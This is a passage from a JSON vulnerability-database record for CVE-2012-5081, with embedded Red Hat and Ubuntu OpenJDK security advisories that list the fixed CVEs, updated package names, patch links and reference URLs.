\n(CVE-2012-5077)\n\nIt was discovered that the java.io.FilePermission class exposed the hash\ncode of the canonicalized path name. An untrusted Java application or\napplet could possibly use this flaw to determine certain system paths, such\nas the current working directory. (CVE-2012-3216)\n\nThis update disables Gopher protocol support in the java.net package by\ndefault. Gopher support can be enabled by setting the newly introduced\nproperty, \"jdk.net.registerGopherProtocol\", to true. (CVE-2012-5085)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website. \n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.5. Refer to\nthe NEWS file, linked to in the References, for further information. \n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/knowledge/articles/11258\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n856124 - CVE-2012-4416 OpenJDK: uninitialized Array JVM memory disclosure (Hotspot, 7198606)\n865346 - CVE-2012-3216 OpenJDK: java.io.FilePermission information leak (Libraries, 6631398)\n865348 - CVE-2012-5068 OpenJDK: RhinoScriptEngine security bypass (Scripting, 7143535)\n865354 - CVE-2012-5077 OpenJDK: SecureRandom mulitple seeders information disclosure (Security, 7167656)\n865357 - CVE-2012-5073 OpenJDK: LogManager security bypass (Libraries, 7169884)\n865363 - CVE-2012-5075 OpenJDK: RMIConnectionImpl information disclosure (JMX, 7169888)\n865365 - CVE-2012-5072 OpenJDK: AccessController.doPrivilegedWithCombiner() information disclosure (Security, 7172522)\n865370 - CVE-2012-5081 OpenJDK: JSSE denial of service (JSSE, 7186286)\n865428 - CVE-2012-5086 OpenJDK: XMLDecoder sandbox restriction bypass (Beans, 7195917)\n865511 - CVE-2012-5084 OpenJDK: DefaultFormatter insufficient data validation (Swing, 7195194)\n865514 - CVE-2012-5089 OpenJDK: RMIConnectionImpl insufficient access control checks (JMX, 7198296)\n865519 - CVE-2012-5071 OpenJDK: DescriptorSupport insufficient package access checks (JMX, 7192975)\n865531 - CVE-2012-5069 OpenJDK: Executors state handling issues (Concurrency, 7189103)\n865541 - CVE-2012-5085 OpenJDK: disable Gopher support by default (Gopher, 7189567)\n865568 - CVE-2012-5079 OpenJDK: ServiceLoader reject not subtype classes without instantiating (Libraries, 7195919)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2012-3216.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-4416.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5068.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5069.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5071.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5072.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5073.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5075.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5077.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5079.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5081.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5084.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5085.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5086.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5089.html\nhttps://access.redhat.com/security/updates/classification/#critical\nhttp://icedtea.classpath.org/hg/release/icedtea6-1.11/file/icedtea6-1.11.5/NEWS\nhttp://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2012 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFQftnqXlSAg2UNWIIRAjiMAJ9fURghELdTR+Cc8Y57xJQNW0E6RACfaKRO\nsA1k2caLD2R40zVc9Rc7HIY=\n=1eL6\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ============================================================================\nUbuntu Security Notice USN-1619-1\nOctober 26, 2012\n\nopenjdk-6, openjdk-7 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.10\n- Ubuntu 12.04 LTS\n- Ubuntu 11.10\n- Ubuntu 11.04\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK. An attacker could exploit these\nto cause a denial of service. \nThese issues only affected Ubuntu 12.10. (CVE-2012-5067, CVE-2012-5070)\n\nVulnerabilities were discovered in the OpenJDK JRE related to data\nintegrity. (CVE-2012-5073, CVE-2012-5079)\n\nA vulnerability was discovered in the OpenJDK JRE related to information\ndisclosure and data integrity. An attacker could exploit these\nto cause a denial of service. These issues only affected Ubuntu 12.10. (CVE-2012-5081)\n\nPlease see the following for more information:\nhttp://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.10:\n icedtea-7-jre-cacao 7u9-2.3.3-0ubuntu1~12.10.1\n icedtea-7-jre-jamvm 7u9-2.3.3-0ubuntu1~12.10.1\n openjdk-7-jre 7u9-2.3.3-0ubuntu1~12.10.1\n openjdk-7-jre-headless 7u9-2.3.3-0ubuntu1~12.10.1\n openjdk-7-jre-lib 7u9-2.3.3-0ubuntu1~12.10.1\n openjdk-7-jre-zero 7u9-2.3.3-0ubuntu1~12.10.1\n\nUbuntu 12.04 LTS:\n icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~12.04.1\n icedtea-6-jre-jamvm 6b24-1.11.5-0ubuntu1~12.04.1\n openjdk-6-jre 6b24-1.11.5-0ubuntu1~12.04.1\n openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~12.04.1\n openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~12.04.1\n openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~12.04.1\n\nUbuntu 11.10:\n icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~11.10.1\n icedtea-6-jre-jamvm 6b24-1.11.5-0ubuntu1~11.10.1\n openjdk-6-jre 6b24-1.11.5-0ubuntu1~11.10.1\n openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~11.10.1\n openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~11.10.1\n openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~11.10.1\n\nUbuntu 11.04:\n icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~11.04.1\n icedtea-6-jre-jamvm 6b24-1.11.5-0ubuntu1~11.04.1\n openjdk-6-jre 6b24-1.11.5-0ubuntu1~11.04.1\n openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~11.04.1\n openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~11.04.1\n openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~11.04.1\n\nUbuntu 10.04 LTS:\n icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~10.04.2\n openjdk-6-jre 6b24-1.11.5-0ubuntu1~10.04.2\n openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~10.04.2\n openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~10.04.2\n openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~10.04.2\n\nThis update uses a new upstream release, which includes additional bug\nfixes", "sources": [ { "db": "NVD", "id": "CVE-2012-5081" }, { "db": "CERT/CC", "id": "VU#144389" }, { "db": "BID", "id": "56071" }, { "db": "VULMON", "id": "CVE-2012-5081" }, { "db": "PACKETSTORM", "id": "117454" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "117478" }, { "db": "PACKETSTORM", "id": "119308" }, { "db": "PACKETSTORM", "id": "118306" }, { "db": "PACKETSTORM", "id": "117825" }, { "db": "PACKETSTORM", "id": "118140" }, { "db": "PACKETSTORM", "id": "118835" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "124943" }, { "db": "PACKETSTORM", "id": "117453" }, { "db": "PACKETSTORM", "id": "117704" } ], "trust": 3.06 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-5081", "trust": 3.2 }, { "db": "BID", "id": "56071", "trust": 2.0 }, { "db": "HITACHI", "id": "HS12-023", "trust": 2.0 }, { "db": "SECUNIA", "id": "51438", "trust": 1.7 }, { "db": "SECUNIA", "id": "51313", "trust": 1.7 }, { "db": "SECUNIA", "id": "51393", "trust": 1.7 }, { "db": "SECUNIA", "id": "51315", "trust": 1.7 }, { "db": "SECUNIA", "id": "51327", "trust": 1.7 }, { "db": "SECUNIA", "id": "51141", "trust": 1.7 }, { "db": "SECUNIA", "id": "51326", "trust": 1.7 }, { "db": "SECUNIA", "id": "51328", "trust": 1.7 }, { "db": "SECUNIA", "id": "51028", "trust": 1.7 }, { "db": "SECUNIA", "id": "51390", "trust": 1.7 }, { "db": "SECUNIA", "id": "51166", "trust": 1.7 }, { "db": "SECUNIA", "id": "51029", "trust": 1.7 }, { "db": "CERT/CC", "id": "VU#144389", "trust": 1.2 }, { "db": "CNNVD", "id": "CNNVD-201210-293", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-17-213-02", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2012-5081", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "117454", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123734", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "117478", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "119308", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "118306", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "117825", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "118140", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "118835", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "124943", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "117453", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "117704", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#144389" }, { "db": "VULMON", "id": "CVE-2012-5081" }, { "db": "BID", "id": "56071" }, { "db": "PACKETSTORM", "id": "117454" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "117478" }, { "db": "PACKETSTORM", "id": "119308" }, { "db": "PACKETSTORM", "id": "118306" }, { "db": "PACKETSTORM", "id": "117825" }, { "db": "PACKETSTORM", "id": "118140" }, { "db": "PACKETSTORM", "id": "118835" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "124943" }, { "db": "PACKETSTORM", "id": "117453" }, { "db": "PACKETSTORM", "id": "117704" }, { "db": "CNNVD", "id": "CNNVD-201210-293" }, { "db": "NVD", "id": "CVE-2012-5081" } ] }, "id": "VAR-201210-0280", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.75 }, "last_update_date": "2024-07-23T20:24:43.164000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Oracle Java SE JRE Fixes for Unknown Security Vulnerabilities in Components", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=192743" }, { "title": "Red Hat: Critical: java-1.4.2-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20121485 - security advisory" }, { "title": "Red Hat: Critical: java-1.5.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20121465 - security advisory" }, { "title": "Red Hat: Critical: java-1.6.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20121384 - security advisory" }, { "title": "Red Hat: Important: java-1.6.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20121385 - security advisory" }, { "title": "Red Hat: Important: java-1.7.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20121386 - security advisory" }, { "title": "Red Hat: Critical: java-1.6.0-sun security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20121392 - security advisory" }, { "title": "Red Hat: Critical: java-1.6.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20121466 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-oracle security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20121391 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20121467 - security advisory" }, { "title": "Amazon Linux AMI: ALAS-2012-136", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2012-136" }, { "title": "Amazon Linux AMI: ALAS-2012-137", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2012-137" }, { "title": "Ubuntu Security Notice: openjdk-6, openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1619-1" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131456 - security advisory" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131455 - security advisory" }, { "title": "", "trust": 0.1, "url": "https://github.com/tomato42/marvin-toolkit " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/apple-patches-java-flaws-101812/77126/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2012-5081" }, { "db": "CNNVD", "id": "CNNVD-201210-293" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2012-5081" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html" }, { "trust": 2.5, "url": "http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21620037" }, { "trust": 2.0, "url": "http://www.xerox.com/download/security/security-bulletin/16287-4d6b7b0c81f7b/cert_xrx13-003_v1.0.pdf" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631786" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21620575" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2012-1385.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2012-1392.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2012-1466.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1455.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1456.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/56071" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2012-1391.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2012-1386.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-11/msg00011.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-10/msg00023.html" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=135542848327757\u0026w=2" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-11/msg00010.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-10/msg00016.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-11/msg00022.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2012-1467.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2012-1465.html" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=135758563611658\u0026w=2" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51029" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51028" }, { "trust": 1.7, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs12-023/index.html" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51141" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51438" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51328" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51326" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51393" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51390" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51315" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51313" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51327" }, { "trust": 1.7, "url": "http://secunia.com/advisories/51166" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:150" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a16043" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3216" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5073" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5071" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5081" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5072" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5068" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5069" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5084" }, { "trust": 0.8, "url": "https://robotattack.org" }, { "trust": 0.8, "url": "https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-meyer.pdf" }, { "trust": 0.8, "url": "http://archiv.infsec.ethz.ch/education/fs08/secsem/bleichenbacher98.pdf" }, { "trust": 0.8, "url": "https://www.cert.org/historical/advisories/ca-1998-07.cfm" }, { "trust": 0.8, "url": "https://tools.ietf.org/html/rfc5246#section-7.4.7.1" }, { "trust": 0.8, "url": "http://cwe.mitre.org/data/definitions/203.html" }, { "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20171212-bleichenbacher" }, { "trust": 0.8, "url": "https://support.citrix.com/article/ctx230238" }, { "trust": 0.8, "url": "https://support.f5.com/csp/article/k21905460" }, { "trust": 0.8, "url": "https://github.com/bcgit/bc-java/commit/a00b684465b38d722ca9a3543b8af8568e6bad5c" }, { "trust": 0.8, "url": "https://github.com/matrixssl/matrixssl/blob/master/doc/changes.md" }, { "trust": 0.8, "url": "https://support.microfocus.com/kb/doc.php?id=7022561" }, { "trust": 0.8, "url": "https://github.com/wolfssl/wolfssl/pull/1229" }, { "trust": 0.8, "url": "https://community.rsa.com/docs/doc-85268" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5075" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5089" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1531" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5077" }, { "trust": 0.7, "url": "https://www.redhat.com/security/data/cve/cve-2012-5073.html" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4416" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5079" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5086" }, { "trust": 0.7, "url": "https://www.redhat.com/security/data/cve/cve-2012-5079.html" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5085" }, { "trust": 0.7, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.7, "url": "https://www.redhat.com/security/data/cve/cve-2012-5081.html" }, { "trust": 0.7, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.7, "url": "https://www.redhat.com/security/data/cve/cve-2012-3216.html" }, { "trust": 0.7, "url": "https://www.redhat.com/security/data/cve/cve-2012-5084.html" }, { "trust": 0.7, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.7, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1533" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1532" }, { "trust": 0.6, "url": 